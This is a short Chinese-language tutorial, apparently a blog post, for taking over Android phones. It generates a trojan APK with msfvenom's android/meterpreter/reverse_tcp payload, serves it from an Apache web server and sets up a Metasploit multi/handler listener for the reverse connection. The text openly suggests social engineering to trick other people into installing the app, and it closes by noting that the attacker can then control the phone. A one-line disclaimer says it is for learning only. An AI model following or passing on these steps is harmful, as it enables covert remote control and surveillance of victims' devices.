前言
本文章仅用来学习交流,违法乱纪后果自负
第一步,利用msfvenom生成木马
msfvenom -p android/meterpreter/reverse_tcp
当然你也可以不自己建木马,你也可以在然后里植入木马,这个就牵扯反编译那些知识了。
第二步,开启apache2 外网服务器服务
开启成功
这里补充几个命令
重新开启服务
service apache2 restart
关闭服务
service apache2 stop
最好在使用后关闭
如果开启不了,应该是占用了80端口
常见错误:
Job for apache2.service failed because the control process exited with error code.
See “systemctl status apache2.service” and “journalctl -xe” for details.
第二步,利用apache2 外网服务器上传我们的安装包,以供安装手机下载
当然我们也也可以通过发送到安卓手机,通过你一切手段,也就是社会工程学,让别人手机装上这个软件,这里显得牛逼一点,咱用这个
把lll.apk挂到服务器去,也就是复制到外网服务器的文件夹里,linux里一切皆是文件嘛,当然你也可以不要命令行嘛。
已经放到服务器了,手机打开虚拟机ip地址看看
第三步,开启msfconsole渗透利诱程序进行监听
我们设置一个监听,当我们有效载荷执行的时候会反弹信息连接到kali,这样我们就可以操作别人的手机了
通过 multi/handler 这个模块设置监听程序
设置载荷,和生成木马时一样
查看载荷需要设置什么参数,基本就和创建木马时一样
设置IP地址和端口,和创建木马时一样
执行监听端程序
当安卓机打开软件
说明已经控制手机,可以通过?来查询控制指令,也可以网上查找控制指令
大佬总结的命令